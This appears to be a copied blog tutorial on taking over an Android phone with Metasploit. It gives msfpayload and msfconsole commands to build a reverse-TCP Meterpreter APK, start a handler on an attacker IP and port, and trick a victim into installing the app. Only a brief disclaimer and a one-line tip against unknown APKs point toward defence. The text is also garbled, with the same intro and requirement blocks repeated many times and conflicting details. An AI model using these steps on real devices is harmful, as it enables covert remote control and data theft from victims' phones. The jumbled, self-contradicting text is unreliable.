Hacking Android Smartphone with Metasploit
This tutorials is for educational purpose. Don't use for illegal purpose. Just learn how the hacker hack get into your smart phone.
Nowadays mobile users are increasing day by day, the security threat is also increasing together with the growth of its users. How to Hack Android Smartphone using Metasploit. We choose android phone for this tutorial, because lately android phone growing very fast worldwide. Here in kenya you will get android phone for only US$ 50 it's one of the reason why android growing fast.
Here is some initial information for this tutorial:
Attacker IP address: 192.168.8.94
Attacker port to receive connection: 443
Requirements:
1. Metasploit framework (we use Kali Linux 1.0.6 in this tutorial)
2. Android smartphone (we use HTC One android 4.4 KitKat)
- See more at: http://www.hacking-tutorial.com/hacking-tutorial/hacking-android-smartphone-tutorial-using-metasploit/#sthash.ypVCEXqn.dpuf
Attacker IP address: 192.168.8.94
Attacker port to receive connection: 443
Requirements:
1. Metasploit framework (we use Kali Linux 1.0.6 in this tutorial)
2. Android smartphone (we use HTC One android 4.4 KitKat)
- See more at: http://www.hacking-tutorial.com/hacking-tutorial/hacking-android-smartphone-tutorial-using-metasploit/#sthash.ypVCEXqn.dpuf
The information we will use for this tutorials:
Attacker IP address: 192.168.8.94
Attacker port to receive connection: 4444or default 443
Requirements:
1. Metasploit framework (we use Kali Linux or backtrack in this tutorial)
2. Android smartphone (we use HTC one Android 4.4.0 KitKat)
Step by Step
1. Open terminal (CTRL + ALT + T) view tutorial how to create linux keyboard shortcut.2. We will utilize Metasploit payload framework to create exploit for this tutorial.
msfpayload android/meterpreter/reverse_tcp LHOST=<attacker_ip_address> LPORT=<port_to_receive_connection>Below is the screenshot when we executed the command. That attacker Ip address 192.168.8.94

3. Since our payload is reverse_tcp where attacker expect the victim to connect back to attacker/host machine, attacker needs to set up the handler to handle incoming connections to the port specified above. Type msfconsoleon terminal to go to Metasploit console.
Info:
use exploit/multi/handler –> we chose use Metasploit handler4. Next step we will configure the switch for the Metasploit payload we already specified in part 3.
set payload android/meterpreter/reverse_tcp –> make sure the payload is the same with step 2
Info:
set lhost 192.168.8.94 –> attacker IP address5. Attacker already have the Apk's's file and now he will start distribute.
set lport 443 –> port to listen the reverse connection
exploit –> start to listen incoming connection
6. When the victim download the malicious Apk's file and install it. After victim open the application, attacker Metasploit console get paired to the victim phone Have a look at bellow:
7. It's mean that attacker already is in the victim android smartphone and he can do everything with victim phone.
Android Smartphone Tutorial using Metasploit above:
Recommendation:
1. Don't install any apk's from the unknown source.
Here is some initial information for this tutorial:
Attacker IP address: 192.168.8.94
Attacker port to receive connection: 443
Requirements:
1. Metasploit framework (we use Kali Linux 1.0.6 in this tutorial)
2. Android smartphone (we use HTC One android 4.4 KitKat)
- See more at: http://www.hacking-tutorial.com/hacking-tutorial/hacking-android-smartphone-tutorial-using-metasploit/#sthash.ypVCEXqn.dpuf
Attacker IP address: 192.168.8.94
Attacker port to receive connection: 443
Requirements:
1. Metasploit framework (we use Kali Linux 1.0.6 in this tutorial)
2. Android smartphone (we use HTC One android 4.4 KitKat)
- See more at: http://www.hacking-tutorial.com/hacking-tutorial/hacking-android-smartphone-tutorial-using-metasploit/#sthash.ypVCEXqn.dpuf
Nowadays
mobile users are increasing day by day, the security threat is also
increasing together with the growth of its users. Our tutorial for today
is how to Hacking Android Smartphone Tutorial using Metasploit. Why we
choose android phone for this tutorial? simply because lately android
phone growing very fast worldwide. Here in China you can get android
phone for only US$ 30 it's one of the reason why android growing fast. -
See more at:
http://www.hacking-tutorial.com/hacking-tutorial/hacking-android-smartphone-tutorial-using-metasploit/#sthash.ypVCEXqn.dpuf
Nowadays
mobile users are increasing day by day, the security threat is also
increasing together with the growth of its users. Our tutorial for today
is how to Hacking Android Smartphone Tutorial using Metasploit. Why we
choose android phone for this tutorial? simply because lately android
phone growing very fast worldwide. Here in China you can get android
phone for only US$ 30 it's one of the reason why android growing fast. -
See more at:
http://www.hacking-tutorial.com/hacking-tutorial/hacking-android-smartphone-tutorial-using-metasploit/#sthash.ypVCEXqn.dpufd
Nowadays
mobile users are increasing day by day, the security threat is also
increasing together with the growth of its users. Our tutorial for today
is how to Hacking Android Smartphone Tutorial using Metasploit. Why we
choose android phone for this tutorial? simply because lately android
phone growing very fast worldwide. Here in China you can get android
phone for only US$ 30 it's one of the reason why android growing fast. -
See more at:
http://www.hacking-tutorial.com/hacking-tutorial/hacking-android-smartphone-tutorial-using-metasploit/#sthash.ypVCEXqn.dpuf
Nowadays
mobile users are increasing day by day, the security threat is also
increasing together with the growth of its users. Our tutorial for today
is how to Hacking Android Smartphone Tutorial using Metasploit. Why we
choose android phone for this tutorial? simply because lately android
phone growing very fast worldwide. Here in China you can get android
phone for only US$ 30 it's one of the reason why android growing fast. -
See more at:
http://www.hacking-tutorial.com/hacking-tutorial/hacking-android-smartphone-tutorial-using-metasploit/#sthash.ypVCEXqn.dpuf
Post Comment
No comments